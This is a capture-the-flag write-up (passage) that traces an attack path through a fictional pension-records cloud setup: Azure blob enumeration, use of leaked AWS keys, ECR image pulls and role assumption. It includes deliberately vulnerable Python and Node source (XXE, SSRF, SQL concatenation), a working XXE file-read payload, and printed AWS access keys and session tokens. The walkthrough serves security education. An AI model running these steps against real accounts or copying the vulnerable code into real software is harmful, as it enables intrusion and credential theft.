Basically, using Azure Blob storage, one can store blobs (files) in containers (directories) in their storage account (similar to Amazon S3 buckets or Google Cloud Storage buckets). In other words, by examining the Azure Blob URL again, we can deduce that the storage account name is secretchannel, the container name is covid-channel and the blob name is notes-from-covid.txt

Using the Azure Storage REST API, we can fetch additional information about the storage account. I first attempted to list all containers in the storage account by visiting https://secretchannel.blob.core.windows.net/?comp=list, but a ResourceNotFound error is returned, indicating that a public user does not have sufficient privileges to list containers. I then tried to list all blobs in the covid-channel container by visiting https://secretchannel.blob.core.windows.net/covid-channel/?restype=container&comp=list&include=metadata, and the following XML response is returned:

<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ContainerName="https://secretchannel.blob.core.windows.net/covid-channel/">
    <Blobs>
        <Blob>
            <Name>notes-from-covid.txt</Name>
            <Url>https://secretchannel.blob.core.windows.net/covid-channel/notes-from-covid.txt</Url>
            <Properties>
                <Last-Modified>Thu, 19 Nov 2020 10:14:22 GMT</Last-Modified>
                <Etag>0x8D88C73E2D218F9</Etag>
                <Content-Length>285</Content-Length>
                <Content-Type>text/plain</Content-Type>
                <Content-Encoding />
                <Content-Language />
                <Content-MD5>oGU6sX8DewYhX0MDzxGyKg==</Content-MD5>
                <Cache-Control />
                <BlobType>BlockBlob</BlobType>
                <LeaseStatus>unlocked</LeaseStatus>
            </Properties>
            <Metadata />
        </Blob>
        <Blob>
            <Name>project-data.txt</Name>
            <Url>https://secretchannel.blob.core.windows.net/covid-channel/project-data.txt</Url>
            <Properties>
                <Last-Modified>Wed, 02 Dec 2020 16:53:44 GMT</Last-Modified>
                <Etag>0x8D896E2D456CDFD</Etag>
                <Content-Length>385</Content-Length>
                <Content-Type>text/plain</Content-Type>
                <Content-Encoding />
                <Content-Language />
                <Content-MD5>jVr3QLDwS/WlRVCQ0034HQ==</Content-MD5>
                <Cache-Control />
                <BlobType>BlockBlob</BlobType>
                <LeaseStatus>unlocked</LeaseStatus>
            </Properties>
            <Metadata />
        </Blob>
    </Blobs>
    <NextMarker />
</EnumerationResults>

Nice! It appears that public users are permitted to list blobs in the covid-channel container, allowing us to find a hidden blob (project-data.txt) within.

Note: You can also discover and fetch the hidden blob using AzCopy tool instead:

$ ./azcopy cp 'https://secretchannel.blob.core.windows.net/covid-channel/' . --recursive
INFO: Scanning...
INFO: Any empty folders will not be processed, because source and/or destination doesn't have full folder support

Job 8c7b23b9-bfb4-6b97-7e1d-025d3d1d71b8 has started
Log file is located at: /home/cloud/.azcopy/8c7b23b9-bfb4-6b97-7e1d-025d3d1d71b8.log

0.0 %, 0 Done, 0 Failed, 2 Pending, 0 Skipped, 2 Total,


Job 8c7b23b9-bfb4-6b97-7e1d-025d3d1d71b8 summary
Elapsed Time (Minutes): 0.0333
Number of File Transfers: 2
Number of Folder Property Transfers: 0
Total Number of Transfers: 2
Number of Transfers Completed: 2
Number of Transfers Failed: 0
Number of Transfers Skipped: 0
TotalBytesTransferred: 670
Final Job Status: Completed

$ ls -al covid-channel/
total 16
drwxrwxr-x  2 cloud cloud 4096 Dec  8 08:10 .
drwxrwxr-x 10 cloud cloud 4096 Dec  8 08:10 ..
-rw-r--r--  1 cloud cloud  285 Dec  8 08:10 notes-from-covid.txt
-rw-r--r--  1 cloud cloud  385 Dec  8 08:10 project-data.txt

Bye Azure, Hello Amazon Web Services!

Viewing the hidden blob at https://secretchannel.blob.core.windows.net/covid-channel/project-data.txt returns the following contents:

National Pension Records System (NPRS)
* Inject the vulnerabilities in the two NPRS sub-systems.
(Employee Pension Contribution Upload Form and National Pension Registry)
Containers are uploaded.
---> To provide update to Handler X

Generated a set of credentials for the handler to check the work.
-- Access Credentials --
AKIAU65ZHERXMQX442VZ
2mA8r/iVXcb75dbYUQCrqd70CLwo6wjbR7zYSE0i

We can easily identify that the access credentials provided is a pair of AWS access credentials since AWS access key IDs start with either AKIA (for long-term credentials) or ASIA (for tempoaray credentials).

Furthermore, we now learn that NPRS contains two sub-systems, namely the Employee Pension Contribution Upload Form and the National Pension Registry. It is also mentioned that containers are uploaded, which suggests that Docker, Amazon Elastic Container Service (ECS) or Amazon Elastic Container Registry (ECR) may be used.

Before we continue on, here’s a quick overview of the attack path so far: Initial Entrypoint Progress

Enumerating NRPS Handler

To enumerate the actions permitted using the access credentials obtained, I used WeirdAAL (AWS Attack Library) Do follow the setup guide carefully and configure the AWS keypair. Then, run the recon module of WeirdAAL to let it attempt to enumerate all the AWS services and identify which services the user has permissions to use.

$ cat .env
[default]
aws_access_key_id=AKIAU65ZHERXMQX442VZ
aws_secret_access_key=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

$ python3 weirdAAL.py -m recon_all -t nprs-handler
Account Id: 341301470318
AKIAU65ZHERXMQX442VZ : Is NOT a root key
...

$ python3 weirdAAL.py -m list_services_by_key -t nprs-handler
[+] Services enumerated for AKIAU65ZHERXMQX442VZ [+]
ec2.DescribeInstances
ec2.DescribeSecurityGroups
ecr.DescribeRepositories
elasticbeanstalk.DescribeApplicationVersions
elasticbeanstalk.DescribeApplications
elasticbeanstalk.DescribeEnvironments
elasticbeanstalk.DescribeEvents
elb.DescribeLoadBalancers
elbv2.DescribeLoadBalancers
opsworks.DescribeStacks
route53.ListGeoLocations
sts.GetCallerIdentity

The above output refers to the services and the permitted actions by the user (e.g. describe-instances for ec2 service).
For convenience, I also installed and used AWS CLI version 1 to invoke the permitted actions listed above after importing the credentials.

Note: If you are using AWS CLI v2, note that your results may vary due to breaking changes from AWS CLI v1 to v2.

$ pip3 install awscli --upgrade --user

$ aws configure --profile nprs-handler
AWS Access Key ID [None]: AKIAU65ZHERXMQX442VZ
AWS Secret Access Key [None]: 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
Default region name [None]: ap-southeast-1
Default output format [None]:

$ aws sts get-caller-identity --profile nprs-handler
{
    "UserId": "AIDAU65ZHERXD5V25EJ4W",
    "Account": "341301470318",
    "Arn": "arn:aws:iam::341301470318:user/nprs-handler"
}

We can see that it is possible to fetch details about the AWS IAM user nprs-handler in account 341301470318.

Pulling Images from Amazon ECR

Recall that earlier on, we noted the use of containers. If Amazon Elastic Container Registry (ECR) is used, then perhaps we can connect to the ECR and pull the Docker images of the two subsystems!

Using AWS CLI, we can list all repositories in the ECR:

$ aws ecr describe-repositories --profile nprs-handler
{
    "repositories": [
        {
            "repositoryArn": "arn:aws:ecr:ap-southeast-1:341301470318:repository/national-pension-registry",
            "registryId": "341301470318",
            "repositoryName": "national-pension-registry",
            "repositoryUri": "341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/national-pension-registry",
            "createdAt": 1606621276.0,
            "imageTagMutability": "MUTABLE",
            "imageScanningConfiguration": {
                "scanOnPush": false
            },
            "encryptionConfiguration": {
                "encryptionType": "AES256"
            }
        },
        {
            "repositoryArn": "arn:aws:ecr:ap-southeast-1:341301470318:repository/employee-pension-contribution-upload-form",
            "registryId": "341301470318",
            "repositoryName": "employee-pension-contribution-upload-form",
            "repositoryUri": "341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/employee-pension-contribution-upload-form",
            "createdAt": 1606592582.0,
            "imageTagMutability": "MUTABLE",
            "imageScanningConfiguration": {
                "scanOnPush": false
            },
            "encryptionConfiguration": {
                "encryptionType": "AES256"
            }
        }
    ]
}

Great! We can list the image repositories in the Amazon ECR. Following the instructions listed on the documentation for Amazon ECR registries, we can login to the Amazon ECR successfully:

$ aws ecr get-login-password --profile nprs-handler --region ap-southeast-1 | docker login --username AWS --password-stdin 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com
WARNING! Your password will be stored unencrypted in /home/cloud/.docker/config.json.
Configure a credential helper to remove this warning. See
https://docs.docker.com/engine/reference/commandline/login/#credentials-store

Login Succeeded

Now that we have logged in to the Amazon ECR successfully, we can pull the images for both applications from the Amazon ECR and analyse the Docker images later on.

$ docker pull 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/national-pension-registry:latest
latest: Pulling from national-pension-registry
...
Digest: sha256:fa88b76707f653863d9fbc5c3d8d9cf29ef7479faf14308716d90f1ddca5a276
Status: Downloaded newer image for 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/national-pension-registry:latest
341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/national-pension-registry:latest

$ docker pull 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/employee-pension-contribution-upload-form:latest
...
Digest: sha256:609300f7a12939d4a44ed751d03be1f61d4580e685bfc9071da4da1f73af44d8
Status: Downloaded newer image for 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/employee-pension-contribution-upload-form:latest
341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/employee-pension-contribution-upload-form:latest

Listing Load Balancers & Accessing Contribution Upload Form Web App

Besides being able to access the Amazon ECR, we can also invoke elbv2.DescribeLoadBalancers to enumerate the Elastic Load Balancing (ELB) deployments:

$ aws elbv2 describe-load-balancers --profile nprs-handler
{
    "LoadBalancers": [
        {
            "LoadBalancerArn": "arn:aws:elasticloadbalancing:ap-southeast-1:341301470318:loadbalancer/app/epcuf-cluster-alb/a885789784808790",
            "DNSName": "epcuf-cluster-alb-1647361482.ap-southeast-1.elb.amazonaws.com",
            "CanonicalHostedZoneId": "Z1LMS91P8CMLE5",
            "CreatedTime": "2020-11-29T05:15:27.400Z",
            "LoadBalancerName": "epcuf-cluster-alb",
            "Scheme": "internet-facing",
            "VpcId": "vpc-0edcd7648f616c0eb",
            "State": {
                "Code": "active"
            },
            "Type": "application",
            "AvailabilityZones": [
                {
                    "ZoneName": "ap-southeast-1b",
                    "SubnetId": "subnet-00cf0266992d1a87b",
                    "LoadBalancerAddresses": []
                },
                {
                    "ZoneName": "ap-southeast-1a",
                    "SubnetId": "subnet-0823515e3019418aa",
                    "LoadBalancerAddresses": []
                }
            ],
            "SecurityGroups": [
                "sg-0a35432455c0dcbd8"
            ],
            "IpAddressType": "ipv4"
        }
    ]
}

From the Amazon Resource Name (ARN) of the only Load Balancer deployed, we can easily identify that it is an Application Load Balancer (ALB) by referencing the documentation for the Elastic Load Balancing. The ALB is accessible at http://epcuf-cluster-alb-1647361482.ap-southeast-1.elb.amazonaws.com, and visiting it, we can access the web application for Employee Pension Contribution Upload Form: Employee Pension Contribution Upload Form

Clicking on the Sample document link on the contribution upload form returns a 404 Not Found error page, so likely we need to investigate the docker image for this application to understand its functionalities and hopefully discover some vulnerabilities in the web application.

Analysing Docker Image for Contribution Upload Form

To examine the filesystem of the Docker image, we can simply run the Docker image in a container and execute an interactive shell session in the container:

$ sudo docker run -it 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/employee-pension-contribution-upload-form /bin/bash
[email protected]:/app# ls -alR
.:
total 20
drwxr-xr-x 1 root root 4096 Nov 28 19:45 .
drwxr-xr-x 1 root root 4096 Dec  8 18:37 ..
-rw-r--r-- 1 root root 2735 Nov 28 19:41 app.py
drwxr-xr-x 2 root root 4096 Nov 22 23:12 files
drwxr-xr-x 3 root root 4096 Nov 22 23:12 views

./files:
total 12
drwxr-xr-x 2 root root 4096 Nov 22 23:12 .
drwxr-xr-x 1 root root 4096 Nov 28 19:45 ..
-rw-r--r-- 1 root root  580 Nov 22 23:12 sample-data.xml

...

The source code for /app/app.py is shown below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
from bottle import run, request, post, Bottle, template, static_file
from lxml import etree as etree
import pathlib
import requests
import os

# Will deploy to ECS Cluster hosted on EC2

# Todo: Database Integration
# Database and other relevant credentials will be loaded via the environment file
# Tentative location /app/.env
# For now, just dump all evnironment variables to .env file
env_output = ""
for k, v in os.environ.items():
    env_output += k + "=" + v + "\n"
output_env_file = open(".env", "w")
output_env_file.write(env_output)
output_env_file.close()

current_directory = str(pathlib.Path().absolute())
parser = etree.XMLParser(no_network=False)
app = Bottle()

@app.route('/download/<filename:path>')
def download(filename):
    return static_file(filename, root=current_directory + '/static/files', download=filename)

@app.route('/import',  method='POST')
def import_submission():
    postdata = request.body.read()
    file_name = request.forms.get("xml-data-file")
    data = request.files.get("xml-data-file")
    raw = data.file.read()
    # TODO: validation
    root = etree.fromstring(raw,parser)
    # TODO: save to database
    total = 0
    for contribution in root[0][2]:
        total += int(contribution.text)
    employee = {
        'first_name': root[0][0].text,
        'last_name': root[0][1].text,
        'total_contribution': total
    }
    return template('submission', employee)

# TODO: Webhook for successful import
# Webhook will be used by third party applications.
# Endpoint is not fixed yet, still in staging.
# The other project's development is experiencing delay.

# National Pension Registry is another internal network.
# The machine running this application will have to get the IP whitelisted
# Do check with the NPR dev team on the ip whitelisting

@app.route('/authenticate',  method='POST')
def register():
    endpoint = request.forms.get('endpoint')
    # Endpoint Validation
    username = request.forms.get('username')
    password = request.forms.get('password')
    data = {'username': username, 'password': password}
    res = requests.post(endpoint, data = data)
    return res.text

@app.route('/report',  method='POST')
def submit():
    endpoint = request.forms.get('endpoint')
    # Endpoint Validation
    token = request.forms.get('token')
    usage = request.forms.get('usage')
    contributor_id = request.forms.get('contributor_id')
    constructed_endpoint = endpoint + "?usage=" + usage + "&contributor_id=" + contributor_id
    res = requests.get(constructed_endpoint, headers={'Authorization': 'Bearer ' + token})
    return res.text

@app.route('/',  method='GET')
def index():
    return template('index')

run(app, host='0.0.0.0', port=80, debug=True)

Clearly, the code is very badly written – it’s an amalgamation of numerous bad coding practices found too often :(
Several observations can be made here:

  • The application dumps all environment variables containing “database and other relevant credentials” to /app/.env
  • The XML parser (lxml) used is explicitly allowing network access for related files
  • The /import POST endpoint is vulnerable to XML External Entity (XXE) attacks (the XML parser resolves entities by default), allowing for GET-based Server-Side Request Forgery (SSRF) attacks and arbitrary file disclosure
  • The /authenticate POST endpoint allows for POST-based SSRF with endpoint, username and password params
  • The /report POST endpoint allows for GET-based SSRF using endpoint, usage and contributor_id params
  • Flask debug mode is enabled (debug=True), which may allow for remote code execution (RCE)
  • The other subsystem, National Pension Registry, is another internal network
  • There is some IP whitelisting checks performed by the National Pension Registry application

At this point, we can attempt to guess the IP address or hostname of the National Pension Registry subsystem and use the SSRF vulnerabilities to access the other application. Unfortunately, there is a coding flaw in the application, which causes the application to crash too easily and making it difficult to execute this strategy successfully.

Exploiting XXE to Disclose /app/.env & Obtain AWS IAM Keys

Looking at the possible vulnerabilities to be exploited, we see that we are able to use XXE to read /app/.env to obtain environment variables which may contain “database and other relevant credentials”.

For convenience, we can use the sample document at /app/files/sample-data.xml:

<?xml version="1.0" encoding="ISO-8859-1"?>
<employees>
    <employee>
        <firstname>John</firstname>
        <lastname>Doe</lastname>
        <contributions>
            <january>215</january>
            <february>215</february>
            <march>215</march>
            <april>215</april>
            <may>215</may>
            <june>215</june>
            <july>215</july>
            <august>215</august>
            <september>215</september>
            <october>215</october>
            <november>215</november>
        </contributions>
    </employee>
</employees>

Then, we modify it to include a XXE payload in firstname field as such:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///app/.env">]>
<employees>
    <employee>
        <firstname>&xxe;</firstname>
        <lastname>Doe</lastname>
        <contributions>
            <january>215</january>
            <february>215</february>
            <march>215</march>
            <april>215</april>
            <may>215</may>
            <june>215</june>
            <july>215</july>
            <august>215</august>
            <september>215</september>
            <october>215</october>
            <november>215</november>
        </contributions>
    </employee>
</employees>

After that, we upload it using the Employee Pension Contribution Upload Form, and the file contents of /app/.env will be returned after Full Name: in the response: XXE Response

And we discover the long-term credentials for nprs-cross-handler! :smile:
We have now completed half the challenge :scream:, so let’s pause for a minute and take a quick look at our progress into the challenge thus far before continuing on: Midpoint of Attack Path

Enumerating NRPS Cross Handler

Let’s reconfigure WeirdAAL and AWS CLI to use the new credentials we just obtained for nprs-cross-handler and re-run the recon module of WeirdAAL and list all permitted actions.

$ aws configure --profile nprs-cross-handler
AWS Access Key ID [None]: AKIAU65ZHERXDDIVSXPO
AWS Secret Access Key [None]: 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
Default region name [None]: ap-southeast-1
Default output format [None]:

$ cat .env
[default]
aws_access_key_id = AKIAU65ZHERXDDIVSXPO
aws_secret_access_key = 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

$ python3 weirdAAL.py -m recon_all -t nprs-cross-handler
Account Id: 341301470318
AKIAU65ZHERXDDIVSXPO : Is NOT a root key
...

$ python3 weirdAAL.py -m list_services_by_key -t nprs-cross-handler
[+] Services enumerated for AKIAU65ZHERXDDIVSXPO [+]
elasticbeanstalk.DescribeApplicationVersions
elasticbeanstalk.DescribeApplications
elasticbeanstalk.DescribeEnvironments
elasticbeanstalk.DescribeEvents
opsworks.DescribeStacks
route53.ListGeoLocations
sts.GetCallerIdentity

Using AWS CLI to invoke the respective accessible actions listed above, nothing interesting was found.

Since the automated enumeration did not work well, it is time to fall back to manual enumeration.
I got stuck here during the competition even though I already knew how to get the flag at this point (I just needed the IP address or hostname of the National Pension Registry sub-system) and did everything below, but obtained different results from what I should be seeing. Perhaps, I enumerated using the wrong IAM keys. I don’t actually know either. In hindsight, I guess better note-taking procedures and perhaps removing unused credentials from ~/.aws/credentials could have helped to avoid such an outcome.

Moving on, we enumerate the policies attached to the user nprs-cross-handler to determine what privileges the user has. There are two primary types of identity-based policies, namely Managed Policies and Inline Policies. Basically, Managed Policies allows policies to be attached to multiple IAM identities (users, groups or roles) or AWS resources whereas Inline Policies are can only be attached to one identity only.

To enumerate Inline Policies, we can use the aws iam list-user-policies command:

$ aws iam list-user-policies --user-name nprs-cross-handler --profile nprs-cross-handler

An error occurred (AccessDenied) when calling the ListUserPolicies operation: User: arn:aws:iam::341301470318:user/nprs-cross-handler is not authorized to perform: iam:ListUserPolicies on resource: user nprs-cross-handler

Nope. Let’s enumerate Managed Policies next using the aws iam list-attached-user-policies command:

$ aws iam list-attached-user-policies --user-name nprs-cross-handler
{
    "AttachedPolicies": [
        {
            "PolicyName": "nprs-cross-handler-policy",
            "PolicyArn": "arn:aws:iam::341301470318:policy/nprs-cross-handler-policy"
        }
    ]
}

Seems like there is a managed policy nprs-cross-handler-policy attached to the nprs-cross-handler user.
Let’s retrieve more information about the managed policy discovered.

Note: It’s also a good idea to enumearte all versions of the policies, but since v1 of nprs-cross-handler-policy is irrelevant for this challenge, I will be omitting it for brevity.

$ aws iam get-policy --policy-arn 'arn:aws:iam::341301470318:policy/nprs-cross-handler-policy' --profile nprs-cross-handler
{
    "Policy": {
        "PolicyName": "nprs-cross-handler-policy",
        "PolicyId": "ANPAU65ZHERXBFWDQBCMX",
        "Arn": "arn:aws:iam::341301470318:policy/nprs-cross-handler-policy",
        "Path": "/",
        "DefaultVersionId": "v2",
        "AttachmentCount": 1,
        "PermissionsBoundaryUsageCount": 0,
        "IsAttachable": true,
        "CreateDate": "2020-11-19T01:46:50Z",
        "UpdateDate": "2020-11-29T08:27:10Z"
    }
}

$ aws iam get-policy-version --policy-arn 'arn:aws:iam::341301470318:policy/nprs-cross-handler-policy' --version-id v2 --profile nprs-cross-handler
{
    "PolicyVersion": {
        "Document": {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Sid": "VisualEditor0",
                    "Effect": "Allow",
                    "Action": "iam:ListAttachedUserPolicies",
                    "Resource": "arn:aws:iam::341301470318:user/*"
                },
                {
                    "Sid": "VisualEditor1",
                    "Effect": "Allow",
                    "Action": [
                        "iam:GetPolicy",
                        "iam:GetPolicyVersion"
                    ],
                    "Resource": "arn:aws:iam::341301470318:policy/*"
                },
                {
                    "Sid": "VisualEditor2",
                    "Effect": "Allow",
                    "Action": "sts:AssumeRole",
                    "Resource": "arn:aws:iam::628769934365:role/cross-account-ec2-access"
                }
            ]
        },
        "VersionId": "v2",
        "IsDefaultVersion": true,
        "CreateDate": "2020-11-29T08:27:10Z"
    }
}

It looks like the attached user policy allows the nprs-cross-handler user to assume the role cross-account-ec2-access!
Let’s request for temporary credentials for the assumed role user using aws sts assume-role command.

$ aws sts assume-role --role-arn 'arn:aws:iam::628769934365:role/cross-account-ec2-access' --role-session-name session
{
    "Credentials": {
        "AccessKeyId": "ASIAZEZM3ZQOVCX7EEF4",
        "SecretAccessKey": "NgAGcf1HnpIAjrNdqv3E7XGXy1D9h5AC5IdfTAxj",
        "SessionToken": "FwoGZXIvYXdzENH//////////wEaDHejxi0VSza/b+hi/yKrAYDc6cpf8NeBGGCCXVy6RKbQCvQBVt/OY+97yMxP6oKaMpQWMM4L7vxB3KlLBFLkVM5TEbXZutQrmmGQlFQV1nRSHHk902qTgRGFvewf8yoFfAKKEZZbyxWi0I8eRiaDt1Db6G6W2FyBjEqVR0bZV3DrJefEQ1LJDCNTWU1a3uy2pWu813s4hu09o3RKIAfxuXhh09zr5dK3cJ0UH0gS85Oar2qSIETW0t/NNSjF+MH+BTItGrwf4r3UciOrx8c0eXEP5AascpUy6c/jP5DRa62+tVI2uUirQz6I8OfyPKSu",
        "Expiration": "2020-12-09T08:27:01Z"
    },
    "AssumedRoleUser": {
        "AssumedRoleId": "AROAZEZM3ZQORFHAJAKYS:session",
        "Arn": "arn:aws:sts::628769934365:assumed-role/cross-account-ec2-access/session"
    }
}

Enumerating Cross Account EC2 Access Role

Now that we have temporary credentials for the cross-account-ec2-access role user, let’s reconfigure WeirdAAL and AWS CLI yet again to use the temporary credentials for the assumed role and re-run the recon module of WeirdAAL and list all permitted actions.

$ cat ~/.aws/credentials
[cross-account-ec2-access]
aws_access_key_id=ASIAZEZM3ZQOVCX7EEF4
aws_secret_access_key=NgAGcf1HnpIAjrNdqv3E7XGXy1D9h5AC5IdfTAxj
aws_session_token=FwoGZXIvYXdzENH//////////wEaDHejxi0VSza/b+hi/yKrAYDc6cpf8NeBGGCCXVy6RKbQCvQBVt/OY+97yMxP6oKaMpQWMM4L7vxB3KlLBFLkVM5TEbXZutQrmmGQlFQV1nRSHHk902qTgRGFvewf8yoFfAKKEZZbyxWi0I8eRiaDt1Db6G6W2FyBjEqVR0bZV3DrJefEQ1LJDCNTWU1a3uy2pWu813s4hu09o3RKIAfxuXhh09zr5dK3cJ0UH0gS85Oar2qSIETW0t/NNSjF+MH+BTItGrwf4r3UciOrx8c0eXEP5AascpUy6c/jP5DRa62+tVI2uUirQz6I8OfyPKSu

$ cat .env
[default]
aws_access_key_id=ASIAZEZM3ZQOVCX7EEF4
aws_secret_access_key=NgAGcf1HnpIAjrNdqv3E7XGXy1D9h5AC5IdfTAxj
aws_session_token=FwoGZXIvYXdzENH//////////wEaDHejxi0VSza/b+hi/yKrAYDc6cpf8NeBGGCCXVy6RKbQCvQBVt/OY+97yMxP6oKaMpQWMM4L7vxB3KlLBFLkVM5TEbXZutQrmmGQlFQV1nRSHHk902qTgRGFvewf8yoFfAKKEZZbyxWi0I8eRiaDt1Db6G6W2FyBjEqVR0bZV3DrJefEQ1LJDCNTWU1a3uy2pWu813s4hu09o3RKIAfxuXhh09zr5dK3cJ0UH0gS85Oar2qSIETW0t/NNSjF+MH+BTItGrwf4r3UciOrx8c0eXEP5AascpUy6c/jP5DRa62+tVI2uUirQz6I8OfyPKSu

$ python3 weirdAAL.py -m recon_all -t cross-account-ec2-access
Account Id: 341301470318
ASIAZEZM3ZQOVCX7EEF4 : Is NOT a root key
...

$ python3 weirdAAL.py -m list_services_by_key -t cross-account-ec2-access
[+] Services enumerated for ASIAZEZM3ZQO4WFMZ3U2 [+]
ec2.DescribeAccountAttributes
ec2.DescribeAddresses
...
elasticbeanstalk.DescribeApplicationVersions
elasticbeanstalk.DescribeApplications
elasticbeanstalk.DescribeEnvironments
elasticbeanstalk.DescribeEvents
elb.DescribeLoadBalancers
elbv2.DescribeLoadBalancers
opsworks.DescribeStacks
route53.ListGeoLocations
sts.GetCallerIdentity

If we run the aws elbv2 describe-load-balancers command, we can find the npr-cluster-alb deployed for the National Pension Registry application.

$ aws elbv2 describe-load-balancers --profile cross-account-ec2-access
{
    "LoadBalancers": [
        {
            "LoadBalancerArn": "arn:aws:elasticloadbalancing:ap-southeast-1:628769934365:loadbalancer/app/npr-cluster-alb/96b0036340fbf14d",
            "DNSName": "internal-npr-cluster-alb-1113089864.ap-southeast-1.elb.amazonaws.com",
            "CanonicalHostedZoneId": "Z1LMS91P8CMLE5",
            "CreatedTime": "2020-11-29T04:03:22.810Z",
            "LoadBalancerName": "npr-cluster-alb",
            "Scheme": "internal",
            "VpcId": "vpc-0dcb6e571fd026058",
            "State": {
                "Code": "active"
            },
            "Type": "application",
            "AvailabilityZones": [
                {
                    "ZoneName": "ap-southeast-1b",
                    "SubnetId": "subnet-0814fe411ae20fcc7",
                    "LoadBalancerAddresses": []
                },
                {
                    "ZoneName": "ap-southeast-1a",
                    "SubnetId": "subnet-0be4fa2daa74f89dd",
                    "LoadBalancerAddresses": []
                }
            ],
            "SecurityGroups": [
                "sg-0dc2665a5ee555216"
            ],
            "IpAddressType": "ipv4"
        }
    ]
}

Notice that the DNS Name for the ALB starts with internal-, which indicates that the npr-cluster-alb is an internally-accessible ALB.

We can also verify it by querying the A records for the DNS name:

$ dig +short internal-npr-cluster-alb-1113089864.ap-southeast-1.elb.amazonaws.com -t A @8.8.8.8
10.1.1.173
10.1.0.170

Which confirms our suspicion. Since the application is only accessible via the internal network, we probably have to leverage the SSRF vulnerability in the Employee Pension Contribution Upload Form application to reach the National Pension Registry application.

We are finally close to getting a flag! It is also likely that we need to exploit additional vulnerabilities in the National Pension Registry application to obtain the flag.

Here’s a quick recap of our progress before we continue on: Attack Path Reachng National Pension Registry

Analysing Docker Image for National Pension Registry

Let’s analyse the Docker image for the National Pension Registry application just like how we did for the Employee Pension Contribution Upload Form application.

$ docker run -it 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/national-pension-registry /bin/bash
[email protected]:/usr/src/app# ls -al
total 72
drwxr-xr-x   1 root root  4096 Nov 29 03:43 .
drwxr-xr-x   1 root root  4096 Nov 19 01:41 ..
-rw-r--r--   1 root root  5587 Nov 28 19:41 index.js
drwxr-xr-x 120 root root  4096 Nov 19 01:41 node_modules
-rw-r--r--   1 root root 41347 Nov 16 17:56 package-lock.json
-rw-r--r--   1 root root   490 Nov 16 17:56 package.json
drwxr-xr-x   2 root root  4096 Nov 29 03:43 prod-keys
[email protected]:/usr/src/app# ls -al prod-keys
total 16
drwxr-xr-x 2 root root 4096 Nov 29 03:43 .
drwxr-xr-x 1 root root 4096 Nov 29 03:43 ..
-rw-r--r-- 1 root root 1674 Nov 22 23:12 prod-private-key.pem
-rw-r--r-- 1 root root  558 Nov 22 23:12 prod-public-keys.json

The source code for /usr/src/app/index.js is shown below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
const { Sequelize } = require('sequelize');
const jwt = require('jsonwebtoken');
const jwksClient = require('jwks-rsa');
const fs = require('fs');
const privateKey = fs.readFileSync('prod-keys/prod-private-key.pem');
const jku_link = "http://127.0.0.1:8333/prod-public-keys.json";
const sequelize = new Sequelize('postgres://npr-rds-read-only:[email protected]east-1.rds.amazonaws.com:5432/national_pension_records');
const express = require('express');
const bodyParser = require('body-parser');
const ipRangeCheck = require("ip-range-check");
const url = require('url');
const app = express();
const whitelistedIPRanges = ["127.0.0.1/32","15.193.2.0/24","15.177.82.0/24","122.248.192.0/18","54.169.0.0/16","54.255.0.0/16","52.95.255.32/28","175.41.128.0/18","13.250.0.0/15","64.252.102.0/24","99.77.143.0/24","52.76.128.0/17","64.252.103.0/24","52.74.0.0/16","54.179.0.0/16","52.220.0.0/15","18.142.0.0/15","46.137.192.0/19","46.137.224.0/19","46.51.216.0/21","52.94.248.32/28","54.254.0.0/16","54.151.128.0/17","18.136.0.0/16","13.212.0.0/15","3.5.146.0/23","64.252.104.0/24","18.140.0.0/15","52.95.242.0/24","99.77.161.0/24","3.5.148.0/22","18.138.0.0/15","52.119.205.0/24","52.76.0.0/17","54.251.0.0/16","64.252.105.0/24","3.0.0.0/15","52.77.0.0/16","13.228.0.0/15"];

app.use(bodyParser.urlencoded({ extended: true }));

const authenticateJWT = async(req, res, next) => {
    const authHeader = req.headers.authorization;
    if (authHeader) {
        const authenticationType = authHeader.split(' ')[0];
        const token = authHeader.split(' ')[1];
        if (authenticationType === "Bearer") {
            let usage = req.query.usage;
            let check = await validateUserClaim(usage,token);
            if (check) {
                next();
            }else {
                res.sendStatus(401);
            }
        }else {
            res.sendStatus(401);
        }
    } else {
        res.sendStatus(401);
    }
};

function validateUserInputs(payload){
    // check for special characters
    var format = /[`[email protected]#$%^&*()+\-=\[\]{}':"\\|,<>\/?~]/;
    return format.test(payload);
}

async function getCustomReport(contributorId){
    const results = await sequelize.query('SELECT * from records."contributions" where contributor_id = ' + contributorId, { type: sequelize.QueryTypes.SELECT });
    console.log(results);
    return results[0];
}

async function getSummaryReport(){
    const results = await sequelize.query('select sum(contribution_total) from records.contributions', { type: sequelize.QueryTypes.SELECT });
    return results[0];
}

async function validateUserClaim(usage, rawToken) {
    let payload = await verifyToken(rawToken);
    if (payload != null) {
        // Simple RBAC
        // Only allow Admin to pull the results
        if (usage == "custom-report"){
            if (payload.role == "admin") {
                return true;
            } else {
                return false;
            }
        }

        if (usage == "user-report"){
            if (payload.role == "user") {
                return true;
            } else {
                return false;
            }
        }

        if (usage == "summary-report"){
